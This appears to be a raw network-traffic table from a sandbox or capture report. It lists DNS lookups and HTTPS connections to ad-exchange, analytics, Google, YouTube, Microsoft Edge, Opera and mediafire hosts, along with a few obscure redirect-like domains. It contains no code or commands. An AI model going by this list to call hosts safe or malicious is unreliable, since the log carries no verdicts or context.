| US | 1.1.1.1:53 | ep1.adtrafficquality.google | udp |
| US | 1.1.1.1:53 | oa.openxcdn.net | udp |
| US | 1.1.1.1:53 | static.nl3.vip.prod.criteo.net | udp |
| US | 1.1.1.1:53 | cdn-ima.33across.com.cdn.cloudflare.net | udp |
| US | 1.1.1.1:53 | invstatic101.creativecdn.com | udp |
| AU | 1.0.0.1:53 | id.a-mx.com | udp |
| AU | 1.0.0.1:53 | dcs-ups.g03.yahoodns.net | udp |
| AU | 1.0.0.1:53 | gum.nl3.vip.prod.criteo.com | udp |
| AU | 1.0.0.1:53 | id5-sync.com | udp |
| AU | 1.0.0.1:53 | id.crwdcntrl.net | udp |
| AU | 1.0.0.1:53 | ep1.adtrafficquality.google | udp |
| AU | 1.0.0.1:53 | oa.openxcdn.net | udp |
| AU | 1.0.0.1:53 | static.nl3.vip.prod.criteo.net | udp |
| AU | 1.0.0.1:53 | invstatic101.creativecdn.com | udp |
| AU | 1.0.0.1:53 | cdn-ima.33across.com.cdn.cloudflare.net | udp |
| US | 34.120.133.55:443 | api.rlcdn.com | udp |
| US | 1.1.1.1:53 | c3.a-mo.net | udp |
| GB | 172.217.16.226:443 | ep1.adtrafficquality.google | udp |
| US | 1.1.1.1:53 | ep2.adtrafficquality.google | udp |
| AU | 1.0.0.1:53 | c3.a-mo.net | udp |
| NL | 79.127.227.46:443 | c3.a-mo.net | tcp |
| AU | 1.0.0.1:53 | ep2.adtrafficquality.google | udp |
| GB | 142.250.179.225:443 | ep2.adtrafficquality.google | tcp |
| US | 1.1.1.1:53 | ep2.adtrafficquality.google | udp |
| AU | 1.0.0.1:53 | ep2.adtrafficquality.google | udp |
| US | 1.1.1.1:53 | ep2.adtrafficquality.google | udp |
| GB | 142.250.179.225:443 | ep2.adtrafficquality.google | udp |
| US | 104.18.35.167:443 | cdn-ima.33across.com | tcp |
| US | 34.102.146.192:443 | oa.openxcdn.net | tcp |
| NL | 178.250.1.3:443 | static.nl3.vip.prod.criteo.net | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | tcp |
| US | 1.1.1.1:53 | lb.eu-1-id5-sync.com | udp |
| US | 1.1.1.1:53 | dnacdn.net | udp |
| US | 1.1.1.1:53 | hbopenbid.pubmatic.com | udp |
| US | 1.1.1.1:53 | hb.yellowblue.io | udp |
| US | 1.1.1.1:53 | fastlane.rubiconproject.com | udp |
| US | 1.1.1.1:53 | tlx.3lift.com | udp |
| US | 1.1.1.1:53 | prebid.a-mo.net | udp |
| AU | 1.0.0.1:53 | lb.eu-1-id5-sync.com | udp |
| AU | 1.0.0.1:53 | dnacdn.net | udp |
| US | 1.1.1.1:53 | onetag-sys.com | udp |
| US | 1.1.1.1:53 | btlr.sharethrough.com | udp |
| US | 1.1.1.1:53 | ap.lijit.com | udp |
| AU | 1.0.0.1:53 | hbopenbid.pubmatic.com | udp |
| AU | 1.0.0.1:53 | hb.yellowblue.io | udp |
| US | 1.1.1.1:53 | lb.eu-1-id5-sync.com | udp |
| US | 1.1.1.1:53 | dnacdn.net | udp |
| DE | 162.19.138.118:443 | lb.eu-1-id5-sync.com | tcp |
| FR | 178.250.7.13:443 | dnacdn.net | tcp |
| DE | 3.124.64.248:443 | tlx.3lift.com | tcp |
| US | 1.1.1.1:53 | eu-tlx.3lift.com | udp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| GB | 108.138.217.110:443 | hb.yellowblue.io | tcp |
| US | 1.1.1.1:53 | tagged-by.rubiconproject.net.akadns.net | udp |
| US | 1.1.1.1:53 | hb.yellowblue.io | udp |
| AU | 1.0.0.1:53 | prebid.a-mo.net | udp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| US | 1.1.1.1:53 | hbopenbid-ams.pubmnet.com | udp |
| FR | 163.5.194.34:443 | prebid.a-mo.net | tcp |
| US | 1.1.1.1:53 | nld-prebid.a-mx.net | udp |
| AU | 1.0.0.1:53 | btlr.sharethrough.com | udp |
| AU | 1.0.0.1:53 | onetag-sys.com | udp |
| AU | 1.0.0.1:53 | ap.lijit.com | udp |
| DE | 51.89.9.252:443 | onetag-sys.com | tcp |
| US | 1.1.1.1:53 | onetag-sys.com | udp |
| DE | 18.156.199.224:443 | btlr.sharethrough.com | tcp |
| US | 1.1.1.1:53 | btlr-eu-central-1.sharethrough.com | udp |
| DE | 18.156.199.224:443 | btlr.sharethrough.com | tcp |
| US | 1.1.1.1:53 | blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com | udp |
| DE | 18.156.199.224:443 | btlr.sharethrough.com | tcp |
| AU | 1.0.0.1:53 | dnacdn.net | udp |
| AU | 1.0.0.1:53 | lb.eu-1-id5-sync.com | udp |
| AU | 1.0.0.1:53 | eu-tlx.3lift.com | udp |
| AU | 1.0.0.1:53 | hb.yellowblue.io | udp |
| AU | 1.0.0.1:53 | tagged-by.rubiconproject.net.akadns.net | udp |
| AU | 1.0.0.1:53 | hbopenbid-ams.pubmnet.com | udp |
| AU | 1.0.0.1:53 | nld-prebid.a-mx.net | udp |
| US | 1.1.1.1:53 | lb.eu-1-id5-sync.com | udp |
| US | 1.1.1.1:53 | dnacdn.net | udp |
| US | 1.1.1.1:53 | hb.yellowblue.io | udp |
| US | 1.1.1.1:53 | eu-tlx.3lift.com | udp |
| DE | 18.156.199.224:443 | btlr.sharethrough.com | tcp |
| US | 1.1.1.1:53 | onetag-sys.com | udp |
| US | 1.1.1.1:53 | hbopenbid-ams.pubmnet.com | udp |
| AU | 1.0.0.1:53 | btlr-eu-central-1.sharethrough.com | udp |
| AU | 1.0.0.1:53 | blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com | udp |
| US | 1.1.1.1:53 | tagged-by.rubiconproject.net.akadns.net | udp |
| US | 1.1.1.1:53 | nld-prebid.a-mx.net | udp |
| IE | 54.154.129.108:443 | blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com | tcp |
| DE | 18.156.199.224:443 | btlr-eu-central-1.sharethrough.com | tcp |
| US | 1.1.1.1:53 | blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com | udp |
| US | 34.102.146.192:443 | oa.openxcdn.net | udp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | udp |
| AU | 1.0.0.1:53 | dnacdn.net | udp |
| US | 1.1.1.1:53 | oajs.openx.net | udp |
| AU | 1.0.0.1:53 | blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com | udp |
| US | 1.1.1.1:53 | 12.114.248.87.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 46.227.127.79.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 55.133.120.34.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 69.5.22.104.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 11.1.250.178.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 71.68.215.52.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 120.138.19.162.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 167.35.18.104.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 192.146.102.34.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 87.70.96.34.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | oajs.openx.net | udp |
| AU | 1.0.0.1:53 | 12.114.248.87.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 55.133.120.34.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 69.5.22.104.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 11.1.250.178.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 3.1.250.178.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 13.7.250.178.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 110.217.138.108.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 118.138.19.162.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 139.156.173.69.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 112.189.64.185.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 34.194.5.163.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 248.64.124.3.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 224.199.156.18.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 252.9.89.51.in-addr.arpa | udp |
| US | 34.120.107.143:443 | oajs.openx.net | tcp |
| US | 1.1.1.1:53 | oajs.openx.net | udp |
| AU | 1.0.0.1:53 | 226.16.217.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 120.138.19.162.in-addr.arpa | udp |
| US | 1.1.1.1:53 | tpc.googlesyndication.com | udp |
| US | 1.1.1.1:53 | oajs.openx.net | udp |
| AU | 1.0.0.1:53 | 13.7.250.178.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | fonts.googleapis.com | udp |
| AU | 1.0.0.1:53 | oajs.openx.net | udp |
| AU | 1.0.0.1:53 | tpc.googlesyndication.com | udp |
| GB | 142.250.179.225:443 | tpc.googlesyndication.com | tcp |
| DE | 51.89.9.252:443 | onetag-sys.com | udp |
| US | 1.1.1.1:53 | download2261.mediafire.com | udp |
| AU | 1.0.0.1:53 | fonts.googleapis.com | udp |
| US | 199.91.155.2:443 | download2261.mediafire.com | tcp |
| US | 1.1.1.1:53 | download2261.mediafire.com | udp |
| US | 1.1.1.1:53 | c5d29a0769be7746c90183c0352a7552.safeframe.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | download2261.mediafire.com | udp |
| US | 1.1.1.1:53 | download2261.mediafire.com | udp |
| US | 34.120.107.143:443 | oajs.openx.net | udp |
| GB | 142.250.179.225:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.187.193:443 | c5d29a0769be7746c90183c0352a7552.safeframe.googlesyndication.com | tcp |
| US | 1.1.1.1:53 | google-bidout-d.openx.net | udp |
| AU | 1.0.0.1:53 | google-bidout-d.openx.net | udp |
| US | 104.19.208.227:443 | otnolatrnup.com | tcp |
| US | 199.91.155.2:443 | download2261.mediafire.com | tcp |
| US | 1.1.1.1:53 | google-bidout-d.openx.net | udp |
| US | 1.1.1.1:53 | google-bidout-d.openx.net | udp |
| AU | 1.0.0.1:53 | google-bidout-d.openx.net | udp |
| US | 104.19.208.227:443 | otnolatrnup.com | udp |
| US | 1.1.1.1:53 | 108.129.154.54.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 143.107.120.34.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 2.155.91.199.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 143.107.120.34.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 108.129.154.54.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 2.155.91.199.in-addr.arpa | udp |
| US | 104.19.208.227:80 | otnolatrnup.com | tcp |
| US | 1.1.1.1:53 | woreppercomming.com | udp |
| AU | 1.0.0.1:53 | woreppercomming.com | udp |
| GB | 18.165.227.8:443 | woreppercomming.com | tcp |
| US | 1.1.1.1:53 | woreppercomming.com | udp |
| AU | 1.0.0.1:53 | woreppercomming.com | udp |
| US | 1.1.1.1:53 | woreppercomming.com | udp |
| AU | 1.0.0.1:53 | woreppercomming.com | udp |
| US | 1.1.1.1:53 | www.chancial.com | udp |
| US | 1.1.1.1:53 | 8.227.165.18.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | www.chancial.com | udp |
| US | 104.21.79.34:443 | www.chancial.com | tcp |
| US | 1.1.1.1:53 | www.chancial.com | udp |
| AU | 1.0.0.1:53 | 8.227.165.18.in-addr.arpa | udp |
| US | 1.1.1.1:53 | gem.gbc.criteo.com | udp |
| AU | 1.0.0.1:53 | www.chancial.com | udp |
| US | 1.1.1.1:53 | www.chancial.com | udp |
| AU | 1.0.0.1:53 | gem.gbc.criteo.com | udp |
| NL | 185.235.87.249:443 | ag.gbc.criteo.com | tcp |
| US | 1.1.1.1:53 | gbc8.nl3.eu.criteo.com | udp |
| NL | 185.235.87.197:443 | gem.gbc.criteo.com | tcp |
| US | 1.1.1.1:53 | gbc7.nl3.eu.criteo.com | udp |
| AU | 1.0.0.1:53 | www.chancial.com | udp |
| AU | 1.0.0.1:53 | gbc7.nl3.eu.criteo.com | udp |
| AU | 1.0.0.1:53 | gbc8.nl3.eu.criteo.com | udp |
| US | 1.1.1.1:53 | gbc8.nl3.eu.criteo.com | udp |
| US | 1.1.1.1:53 | gbc7.nl3.eu.criteo.com | udp |
| AU | 1.0.0.1:53 | gbc8.nl3.eu.criteo.com | udp |
| AU | 1.0.0.1:53 | gbc7.nl3.eu.criteo.com | udp |
| US | 104.21.79.34:443 | www.chancial.com | udp |
| US | 1.1.1.1:53 | www.opera.com | udp |
| AU | 1.0.0.1:53 | www.opera.com | udp |
| US | 1.1.1.1:53 | front-geo.production.opera-website.route53.opera.com | udp |
| DE | 3.122.39.69:443 | front-geo.production.opera-website.route53.opera.com | tcp |
| AU | 1.0.0.1:53 | front-geo.production.opera-website.route53.opera.com | udp |
| US | 1.1.1.1:53 | cdn-production-opera-website.operacdn.com | udp |
| AU | 1.0.0.1:53 | cdn-production-opera-website.operacdn.com | udp |
| GB | 104.82.234.15:443 | cdn-production-opera-website.operacdn.com | tcp |
| GB | 104.82.234.15:443 | cdn-production-opera-website.operacdn.com | tcp |
| GB | 104.82.234.15:443 | cdn-production-opera-website.operacdn.com | tcp |
| GB | 104.82.234.15:443 | cdn-production-opera-website.operacdn.com | tcp |
| GB | 104.82.234.15:443 | cdn-production-opera-website.operacdn.com | tcp |
| GB | 104.82.234.15:443 | cdn-production-opera-website.operacdn.com | tcp |
| GB | 142.250.179.238:443 | www.googleoptimize.com | tcp |
| US | 1.1.1.1:53 | www.googleoptimize.com | udp |
| US | 1.1.1.1:53 | e11604.dscf.akamaiedge.net | udp |
| US | 1.1.1.1:53 | www.googleoptimize.com | udp |
| AU | 1.0.0.1:53 | e11604.dscf.akamaiedge.net | udp |
| US | 1.1.1.1:53 | e11604.dscf.akamaiedge.net | udp |
| AU | 1.0.0.1:53 | www.googleoptimize.com | udp |
| AU | 1.0.0.1:53 | e11604.dscf.akamaiedge.net | udp |
| GB | 142.250.179.238:443 | www.googleoptimize.com | udp |
| US | 1.1.1.1:53 | 34.79.21.104.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 249.87.235.185.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 197.87.235.185.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 69.39.122.3.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 15.234.82.104.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 238.179.250.142.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 197.87.235.185.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 249.87.235.185.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 34.79.21.104.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 69.39.122.3.in-addr.arpa | udp |
| US | 1.1.1.1:53 | region1.google-analytics.com | udp |
| GB | 142.250.178.1:443 | cdn.ampproject.org | tcp |
| GB | 142.250.178.1:443 | cdn.ampproject.org | tcp |
| GB | 142.250.178.1:443 | cdn.ampproject.org | tcp |
| GB | 142.250.178.1:443 | cdn.ampproject.org | tcp |
| GB | 142.250.178.1:443 | cdn.ampproject.org | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 1.1.1.1:53 | region1.google-analytics.com | udp |
| AU | 1.0.0.1:53 | region1.google-analytics.com | udp |
| US | 1.1.1.1:53 | region1.google-analytics.com | udp |
| GB | 142.250.178.1:443 | cdn.ampproject.org | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| GB | 216.58.201.100:443 | www.google.com | tcp |
| GB | 216.58.201.100:443 | www.google.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| GB | 216.58.201.100:443 | www.google.com | udp |
| US | 1.1.1.1:53 | bat.bing.com | udp |
| US | 1.1.1.1:53 | check.analytics.rlcdn.com | udp |
| AU | 1.0.0.1:53 | bat.bing.com | udp |
| US | 150.171.27.10:443 | bat.bing.com | tcp |
| US | 1.1.1.1:53 | ax-0001.ax-msedge.net | udp |
| AU | 1.0.0.1:53 | check.analytics.rlcdn.com | udp |
| GB | 18.164.68.6:443 | check.analytics.rlcdn.com | tcp |
| US | 1.1.1.1:53 | check.analytics.rlcdn.com | udp |
| GB | 18.164.68.6:443 | check.analytics.rlcdn.com | tcp |
| AU | 1.0.0.1:53 | ax-0001.ax-msedge.net | udp |
| US | 1.1.1.1:53 | ax-0001.ax-msedge.net | udp |
| AU | 1.0.0.1:53 | check.analytics.rlcdn.com | udp |
| AU | 1.0.0.1:53 | ax-0001.ax-msedge.net | udp |
| US | 1.1.1.1:53 | www.clarity.ms | udp |
| US | 13.107.246.64:443 | www.clarity.ms | tcp |
| US | 1.1.1.1:53 | s-part-0036.t-0009.t-msedge.net | udp |
| AU | 1.0.0.1:53 | s-part-0036.t-0009.t-msedge.net | udp |
| US | 1.1.1.1:53 | s-part-0036.t-0009.t-msedge.net | udp |
| AU | 1.0.0.1:53 | s-part-0036.t-0009.t-msedge.net | udp |
| GB | 173.194.76.157:443 | stats.g.doubleclick.net | tcp |
| US | 1.1.1.1:53 | c.clarity.ms | udp |
| IE | 13.74.129.1:443 | c.clarity.ms | tcp |
| US | 1.1.1.1:53 | c-msn-com-nsatc.trafficmanager.net | udp |
| GB | 173.194.76.157:443 | stats.g.doubleclick.net | udp |
| AU | 1.0.0.1:53 | c-msn-com-nsatc.trafficmanager.net | udp |
| US | 1.1.1.1:53 | b.clarity.ms | udp |
| AU | 1.0.0.1:53 | b.clarity.ms | udp |
| US | 4.153.129.168:443 | b.clarity.ms | tcp |
| US | 1.1.1.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 1.1.1.1:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 6.68.164.18.in-addr.arpa | udp |
| US | 1.1.1.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| AU | 1.0.0.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 1.1.1.1:53 | c.bing.com | udp |
| AU | 1.0.0.1:53 | c.bing.com | udp |
| US | 13.107.21.237:443 | c.bing.com | tcp |
| US | 1.1.1.1:53 | dual-a-0034.a-msedge.net | udp |
| AU | 1.0.0.1:53 | dual-a-0034.a-msedge.net | udp |
| US | 1.1.1.1:53 | dual-a-0034.a-msedge.net | udp |
| AU | 1.0.0.1:53 | dual-a-0034.a-msedge.net | udp |
| GB | 142.250.179.225:443 | tpc.googlesyndication.com | tcp |
| US | 1.1.1.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| AU | 1.0.0.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 1.1.1.1:53 | www.facebook.com | udp |
| AU | 1.0.0.1:53 | www.facebook.com | udp |
| US | 1.1.1.1:53 | star-mini.c10r.facebook.com | udp |
| AU | 1.0.0.1:53 | star-mini.c10r.facebook.com | udp |
| US | 1.1.1.1:53 | msedge.sf.dl.delivery.mp.microsoft.com | udp |
| AU | 1.0.0.1:53 | msedge.sf.dl.delivery.mp.microsoft.com | udp |
| GB | 2.19.117.102:443 | msedge.sf.dl.delivery.mp.microsoft.com | tcp |
| GB | 2.19.117.102:443 | msedge.sf.dl.delivery.mp.microsoft.com | tcp |
| US | 1.1.1.1:53 | 102.117.19.2.in-addr.arpa | udp |
| US | 1.1.1.1:53 | b.clarity.ms | udp |
| AU | 1.0.0.1:53 | b.clarity.ms | udp |
| US | 1.1.1.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 1.1.1.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| AU | 1.0.0.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 4.153.129.168:443 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | tcp |
| AU | 1.0.0.1:53 | config.edge.skype.com | udp |
| US | 1.1.1.1:53 | msedge.api.cdp.microsoft.com | udp |
| AU | 1.0.0.1:53 | msedge.api.cdp.microsoft.com | udp |
| IE | 4.245.161.190:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 1.1.1.1:53 | 190.161.245.4.in-addr.arpa | udp |
| US | 1.1.1.1:53 | msedge.f.tlu.dl.delivery.mp.microsoft.com | udp |
| AU | 1.0.0.1:53 | msedge.f.tlu.dl.delivery.mp.microsoft.com | udp |
| GB | 2.19.117.99:80 | msedge.f.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 1.1.1.1:53 | 99.117.19.2.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 99.117.19.2.in-addr.arpa | udp |
| US | 1.1.1.1:53 | g.ezoic.net | udp |
| DE | 18.156.199.224:443 | btlr-eu-central-1.sharethrough.com | tcp |
| DE | 18.156.199.224:443 | btlr-eu-central-1.sharethrough.com | tcp |
| AU | 1.0.0.1:53 | g.ezoic.net | udp |
| US | 1.1.1.1:53 | g.ezoic.net | udp |
| AU | 1.0.0.1:53 | g.ezoic.net | udp |
| GB | 142.250.178.1:443 | cdn.ampproject.org | udp |
| US | 1.1.1.1:53 | tpc.googlesyndication.com | udp |
| GB | 142.250.179.225:443 | tpc.googlesyndication.com | tcp |
| AU | 1.0.0.1:53 | tpc.googlesyndication.com | udp |
| US | 1.1.1.1:53 | tpc.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | tpc.googlesyndication.com | udp |
| DE | 18.156.199.224:443 | btlr-eu-central-1.sharethrough.com | tcp |
| AU | 1.0.0.1:53 | pagead2.googlesyndication.com | udp |
| US | 1.1.1.1:53 | www.google.com | udp |
| GB | 216.58.201.100:443 | www.google.com | udp |
| AU | 1.0.0.1:53 | www.google.com | udp |
| US | 1.1.1.1:53 | www.google.com | udp |
| GB | 172.217.16.226:443 | ep1.adtrafficquality.google | udp |
| AU | 1.0.0.1:53 | www.google.com | udp |
| GB | 172.217.16.226:443 | ep1.adtrafficquality.google | tcp |
| GB | 172.217.16.226:443 | ep1.adtrafficquality.google | tcp |
| US | 1.1.1.1:53 | www.youtube.com | udp |
| AU | 1.0.0.1:53 | www.youtube.com | udp |
| GB | 142.250.180.14:443 | www.youtube.com | udp |
| US | 1.1.1.1:53 | star-mini.c10r.facebook.com | udp |
| AU | 1.0.0.1:53 | star-mini.c10r.facebook.com | udp |
| US | 1.1.1.1:53 | star-mini.c10r.facebook.com | udp |
| AU | 1.0.0.1:53 | star-mini.c10r.facebook.com | udp |
| US | 1.1.1.1:53 | g.ezoic.net | udp |
| AU | 1.0.0.1:53 | g.ezoic.net | udp |
| US | 1.1.1.1:53 | g.ezoic.net | udp |
| AU | 1.0.0.1:53 | g.ezoic.net | udp |
| GB | 142.250.179.226:443 | securepubads.g.doubleclick.net | udp |
| US | 1.1.1.1:53 | youtube-ui.l.google.com | udp |
| GB | 142.250.180.14:443 | www.youtube.com | udp |
| AU | 1.0.0.1:53 | youtube-ui.l.google.com | udp |
| AU | 1.0.0.1:53 | fonts.gstatic.com | udp |
| US | 1.1.1.1:53 | play.google.com | udp |
| GB | 74.125.175.73:443 | rr4.sn-aigl6nzs.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr5.sn-aigl6nzl.googlevideo.com | udp |
| US | 1.1.1.1:53 | i.ytimg.com | udp |
| AU | 1.0.0.1:53 | rr5.sn-aigl6nzl.googlevideo.com | udp |
| GB | 74.125.168.170:443 | rr5.sn-aigl6nzl.googlevideo.com | udp |
| GB | 216.58.212.246:443 | i.ytimg.com | udp |
| US | 1.1.1.1:53 | i.ytimg.com | udp |
| AU | 1.0.0.1:53 | i.ytimg.com | udp |
| US | 1.1.1.1:53 | 246.212.58.216.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 246.212.58.216.in-addr.arpa | udp |
| GB | 216.58.212.246:443 | i.ytimg.com | udp |
| US | 1.1.1.1:53 | yt3.ggpht.com | udp |
| AU | 1.0.0.1:53 | yt3.ggpht.com | udp |
| US | 1.1.1.1:53 | photos-ugc.l.googleusercontent.com | udp |
| GB | 142.250.178.1:443 | yt3.ggpht.com | udp |
| AU | 1.0.0.1:53 | photos-ugc.l.googleusercontent.com | udp |
| GB | 142.250.178.1:443 | yt3.ggpht.com | tcp |
| US | 1.1.1.1:53 | lh3.googleusercontent.com | udp |
| AU | 1.0.0.1:53 | lh3.googleusercontent.com | udp |
| GB | 216.58.204.65:443 | lh3.googleusercontent.com | tcp |
| US | 1.1.1.1:53 | googlehosted.l.googleusercontent.com | udp |
| AU | 1.0.0.1:53 | googlehosted.l.googleusercontent.com | udp |
| US | 1.1.1.1:53 | rr1---sn-aigl6ned.googlevideo.com | udp |
| GB | 216.58.204.65:443 | lh3.googleusercontent.com | udp |
| AU | 1.0.0.1:53 | rr1---sn-aigl6ned.googlevideo.com | udp |
| GB | 173.194.183.70:443 | rr1---sn-aigl6ned.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr1.sn-aigl6ned.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr1.sn-aigl6ned.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr1.sn-aigl6ned.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr1.sn-aigl6ned.googlevideo.com | udp |
| US | 1.1.1.1:53 | 70.183.194.173.in-addr.arpa | udp |
| GB | 173.194.183.70:443 | rr1.sn-aigl6ned.googlevideo.com | udp |
| AU | 1.0.0.1:53 | 70.183.194.173.in-addr.arpa | udp |
| US | 1.1.1.1:53 | rr3---sn-aigzrnld.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr3---sn-aigzrnld.googlevideo.com | udp |
| GB | 74.125.97.72:443 | rr3---sn-aigzrnld.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr3.sn-aigzrnld.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr3.sn-aigzrnld.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr3.sn-aigzrnld.googlevideo.com | udp |
| GB | 74.125.97.72:443 | rr3.sn-aigzrnld.googlevideo.com | udp |
| US | 1.1.1.1:53 | 72.97.125.74.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 72.97.125.74.in-addr.arpa | udp |
| DE | 18.156.199.224:443 | btlr-eu-central-1.sharethrough.com | tcp |
| US | 1.1.1.1:53 | securepubads.g.doubleclick.net | udp |
| AU | 1.0.0.1:53 | securepubads.g.doubleclick.net | udp |
| US | 1.1.1.1:53 | youtube-ui.l.google.com | udp |
| AU | 1.0.0.1:53 | youtube-ui.l.google.com | udp |
| US | 1.1.1.1:53 | rr4---sn-aigl6nzk.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr4---sn-aigl6nzk.googlevideo.com | udp |
| GB | 74.125.175.105:443 | rr4---sn-aigl6nzk.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr4.sn-aigl6nzk.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr4.sn-aigl6nzk.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr4.sn-aigl6nzk.googlevideo.com | udp |
| US | 1.1.1.1:53 | 105.175.125.74.in-addr.arpa | udp |
| GB | 74.125.175.105:443 | rr4.sn-aigl6nzk.googlevideo.com | udp |
| GB | 142.250.180.14:443 | youtube-ui.l.google.com | udp |
| US | 1.1.1.1:53 | rr2---sn-aigzrn7e.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr2---sn-aigzrn7e.googlevideo.com | udp |
| GB | 173.194.5.39:443 | rr2---sn-aigzrn7e.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr2.sn-aigzrn7e.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr2.sn-aigzrn7e.googlevideo.com | udp |
| GB | 173.194.5.39:443 | rr2.sn-aigzrn7e.googlevideo.com | udp |
| GB | 142.250.178.1:443 | yt3.ggpht.com | udp |
| US | 1.1.1.1:53 | 39.5.194.173.in-addr.arpa | udp |
| GB | 142.250.179.225:443 | yt3.ggpht.com | udp |
| AU | 1.0.0.1:53 | 39.5.194.173.in-addr.arpa | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| DE | 18.156.199.224:443 | btlr-eu-central-1.sharethrough.com | tcp |
| GB | 142.250.180.14:443 | youtube-ui.l.google.com | udp |
| AU | 1.0.0.1:53 | fonts.googleapis.com | udp |
| US | 1.1.1.1:53 | rr3---sn-aigzrnsl.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr3---sn-aigzrnsl.googlevideo.com | udp |
| GB | 74.125.168.232:443 | rr3---sn-aigzrnsl.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr3.sn-aigzrnsl.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr3.sn-aigzrnsl.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr3.sn-aigzrnsl.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr3.sn-aigzrnsl.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr3---sn-aigzrnsl.googlevideo.com | udp |
| GB | 74.125.168.232:443 | rr3---sn-aigzrnsl.googlevideo.com | tcp |
